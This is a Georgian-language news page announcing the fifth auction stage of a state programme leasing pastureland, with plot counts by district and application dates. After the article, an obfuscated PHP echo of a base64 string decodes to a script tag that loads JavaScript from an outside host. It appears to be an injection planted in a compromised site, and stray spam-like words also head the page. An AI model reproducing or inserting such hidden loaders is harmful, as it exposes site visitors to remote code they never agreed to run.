celsiusi
ავერსი შნაიდერი
„სახელმწიფო საკუთრებაში არსებული საძოვრების ხელმისაწვდომობის“ პროგრამის ფარგლებში, შეირჩა და გამოქვეყნდა მეხუთე ეტაპზე აუქციონის გზით იჯარით გასაცემი საძოვრის კატეგორიის სასოფლო-სამეურნეო დანიშნულების მიწის ნაკვეთების მონაცემები. 
 
საძოვრების იჯარით აღების მსურველთა განაცხადების მიღება 26 სექტემბერს დაიწყო და 31 ოქტომბრის ჩათვლით გაგრძელდება.
 
გამოქვეყნებულია სამცხე-ჯავახეთის, ქვემო ქართლის, შიდა ქართლის, კახეთის, მცხეთა-მთიანეთის და იმერეთის რეგიონების 118 ერთეული საძოვრის მონაცემები, მათ შორის, ასპინძა - 2, ახალციხე - 1, ნინოწმინდა - 9, ბორჯომი - 13, დმანისი - 24, თეთრიწყარო - 1, წალკა - 2, საგარეჯო - 4, დედოფლისწყარო - 15, თელავი - 4, სიღნაღი - 4, ყვარელი - 14, ახმეტა - 4, მცხეთა - 1, გორი - 3, კასპი - 1, წყალტუბო - 15, ბაღდათი - 1.
 
დღეის მდგომარეობით, ხუთ ეტაპად, სულ გამოქვეყნდა 479 ერთეული აუქციონის გზით იჯარით გასაცემი საძოვრის მონაცემები, საერთო ფართობით - 49,754 ჰექტარი. ამჟამად, ხელმისაწვდომია და განაცხადების მიღება წარმოებს 118 მათგანზე. დეტალური ინფორმაცია განთავსებულია სსიპ მიწის მდგრადი მართვისა და მიწათსარგებლობის მონიტორინგის ეროვნული სააგენტოს და
საქართველოს გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ვებგვერდებზე (www.land.gov.ge www.mepa.gov.ge), ასევე სააგენტოს ოფიციალურ ფეისბუქ გვერდზე.
 
„სახელმწიფო საკუთრებაში არსებული საძოვრების ხელმისაწვდომობის“ სახელმწიფო პროგრამა საქართველოს მთავრობამ 2021 წლის 6 ოქტომბერს დაამტკიცა. პროგრამა მსხვილფეხა და წვრილფეხა რქოსანი პირუტყვის მფლობელ ფერმერებს საშუალებას აძლევს, სასურველი საძოვარი აუქციონის გზით მიიღონ და სამწლიანი იჯარის ხელშეკრულების ფარგლებში განკარგონ. 
 
პროგრამა, საძოვრებზე ლეგიტიმური კერძო პასუხისმგებლობის გაჩენით, ხელს შეუწყობს მათ რაციონალურ გამოყენებას, დაიცავს დეგრადაციისგან და, ამავდროულად, მეცხოველეობის დარგის განვითარებას დაეხმარება. 
 
429
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");